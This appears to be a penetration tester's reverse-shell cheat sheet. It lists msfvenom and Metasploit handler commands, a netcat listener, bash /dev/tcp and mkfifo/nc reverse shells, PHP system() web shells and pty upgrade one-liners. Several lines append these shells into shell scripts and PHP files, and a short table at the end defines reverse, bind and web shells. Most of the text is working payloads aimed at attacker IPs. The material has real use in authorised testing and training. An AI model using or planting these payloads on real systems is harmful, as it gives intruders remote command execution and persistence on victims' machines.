msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=5555 -f exe > shell.exe
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 5555
set ExitOnSession false
exploit -j
https://github.com/ivan-sincek/php-reverse-shell/blob/master/README.md
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
Start a listener
nc -lvnp 8443
Bash reverse
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'https://highon.coffee/blog/reverse-shell-cheat-sheet/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT) >/tmp/f
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8443 >/tmp/f’ | tee -a monitor.sh
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8444 >/tmp/f’ | tee -a bob2.php
echo ‘<?php system (“sudo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.200 8888 >/tmp/f”); ?>’ | tee –a bob6.php
PHP reverse shell scripts
<?php system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your machine’s IP> 1234 >/tmp/f”); ?>
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Upgrade Shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/bash”)’
| Shell Type | Description |
|---|---|
Reverse shell | Initiates a connection back to a “listener” on our attack box. |
Bind shell | “Binds” to a specific port on the target host and waits for a connection from our attack box. |
Web shell | Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command. |